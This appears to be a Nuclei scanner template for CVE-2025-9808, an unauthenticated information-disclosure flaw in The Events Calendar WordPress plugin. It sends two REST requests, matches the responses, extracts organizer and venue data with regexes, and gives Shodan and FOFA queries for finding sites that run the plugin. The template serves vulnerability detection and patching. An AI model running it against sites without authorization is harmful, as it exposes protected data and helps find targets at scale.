
The Events Calendar <= 6.15.2 - Information Disclosure

04 Feb 2026 07:00:26 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

The Events Calendar plugin exposes REST data allowing unauthenticated disclosure of vendors and venues.

id: CVE-2025-9808

info:
  name: The Events Calendar <= 6.15.2 - Information Disclosure
  author: zer0p0int
  severity: medium
  description: |
    The Events Calendar WordPress plugin <= 6.15.2 contains an information disclosure vulnerability caused by REST endpoint exposure, letting unauthenticated attackers extract data about password-protected vendors or venues, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access sensitive information about password-protected vendors or venues.
  remediation: |
    Update to the latest version beyond 6.15.2
  reference:
    - https://www.wiz.io/vulnerability-database/cve/cve-2025-9808
    - https://wpscan.com/plugin/the-events-calendar/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar
    - https://wordpress.org/plugins/the-events-calendar/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9808
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/wp-content/plugins/the-events-calendar/"
    fofa-query: body="/wp-content/plugins/the-events-calendar/"
    publicwww-query: "/wp-content/plugins/the-events-calendar/"
  tags: cve,cve2025,wordpress,wp-plugin,wpscan,the-events-calendar,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/tribe/events/v1/organizers"
      - "{{BaseURL}}/wp-json/tribe/events/v1/venues"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"rest_url","total")'
          - 'contains_any(body,"organizers","venues")'
          - 'contains(header,"application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: organizer_data
        group: 1
        regex:
          - '"organizers":\[(.*?)\],"rest_url"'

      - type: regex
        part: body
        name: venue_data
        group: 1
        regex:
          - '"venues":\[(.*?)\],"rest_url"'
# digest: 4a0a0047304502201673a52f687efaa722968308d3f40ee35d3ffb5462cc28f1eff5137360aece08022100feab62f99f297b44e62813b3e160ec5047e4b1c7fa213309c7312e3fb14ed903:922c64590222798bb761d5b6d8e72950
